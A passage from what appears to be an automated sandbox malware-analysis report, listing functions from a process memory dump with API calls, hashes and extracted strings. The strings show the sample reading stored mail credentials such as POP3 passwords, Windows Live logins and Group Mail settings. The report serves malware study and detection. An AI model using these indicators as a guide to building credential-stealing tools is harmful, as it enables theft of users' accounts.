                                                                                                        • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                        • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                        Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                        • strchr.MSVCRT ref: 0040327B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileStringstrchr
                                                                                                        • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                        • API String ID: 1348940319-1729847305
                                                                                                        • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                        • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                        • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                        • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                        Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                        • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                        • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                        • API String ID: 3510742995-3273207271
                                                                                                        • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                        • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                        • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                        • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                        Function 0040F460 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040F567
                                                                                                        • memset.MSVCRT ref: 0040F57F
                                                                                                          • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                        • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                        • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 78143705-3916222277
                                                                                                        • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                        • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                        • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                        • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                        Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                        • memset.MSVCRT ref: 0040FA1E
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                        • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                        • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                        • API String ID: 945165440-3589380929
                                                                                                        • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                        • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                        • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                        • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                        Function 0040F802 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 118registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040F84A
                                                                                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                        • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                        • String ID: Creds$ps:password
                                                                                                        • API String ID: 2290531041-1872227768
                                                                                                        • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                        • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                        • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                        • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                        Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                          • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                          • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                          • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                        • strchr.MSVCRT ref: 0040371F
                                                                                                        • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                        • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                        • strlen.MSVCRT ref: 00403778
                                                                                                        • sprintf.MSVCRT ref: 0040379C
                                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                        • String ID: %s@gmail.com
                                                                                                        • API String ID: 3261640601-4097000612
                                                                                                        • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                        • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                        • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                        • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                        Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004094C8
                                                                                                        • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                        • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                        • memset.MSVCRT ref: 0040950C
                                                                                                        • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                        • _strcmpi.MSVCRT ref: 00409531
                                                                                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                        • String ID: sysdatetimepick32
                                                                                                        • API String ID: 3411445237-4169760276
                                                                                                        • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                        • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                        • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                        • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                        Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00403504
                                                                                                        • memset.MSVCRT ref: 0040351A
                                                                                                        • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                        • _mbscat.MSVCRT ref: 0040356D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                        • API String ID: 632640181-966475738
                                                                                                        • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                        • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                        • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                        • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                        Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                        • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                        • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                        • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                        • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                        • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                        • String ID:
                                                                                                        • API String ID: 3642520215-0
                                                                                                        • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                        • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                        • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                        • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                        Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                        • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                        • GetDC.USER32(00000000), ref: 004072FB
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                        • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                        • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                        • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                        • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1999381814-0
                                                                                                        • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                        • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                        • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                        • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                        Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                        • API String ID: 1297977491-3883738016
                                                                                                        • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                        • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                        • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                        • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                        Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                          • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                          • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                          • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                        • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                        • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                        • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$memset
                                                                                                        • String ID: gj
                                                                                                        • API String ID: 438689982-4203073231
                                                                                                        • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                        • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                        • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                        • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                        Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm$__aullrem
                                                                                                        • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                        • API String ID: 643879872-978417875
                                                                                                        • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                        • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                        • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                        • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                        Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                        • memset.MSVCRT ref: 004058C3
                                                                                                        • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                        • SetFocus.USER32(?), ref: 00405976
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$FocusItemmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4281309102-0
                                                                                                        • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                        • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                        • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                        • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                        Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                        • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                        • sprintf.MSVCRT ref: 0040A921
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                        • API String ID: 1631269929-4153097237
                                                                                                        • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                        • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                        • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                        • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                        Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040810E
                                                                                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CB7B60,?), ref: 004081B9
                                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                        • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                        • API String ID: 524865279-2190619648
                                                                                                        • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                        • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                        • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                        • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                        Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2571066681.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                        • String ID: 0$6
                                                                                                        • API String ID: 2300387033-3849865405
                                                                                                        • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                        • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                        • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                        • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                        Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004076D7
                                                                                                        • sprintf.MSVCRT ref: 00407704
                                                                                                        • strlen.MSVCRT ref: 00407710
                                                                                                        • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                        • strlen.MSVCRT ref: 00407733
                                                                                                        • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                        Strings
                                                                                                        Memory Dump Source
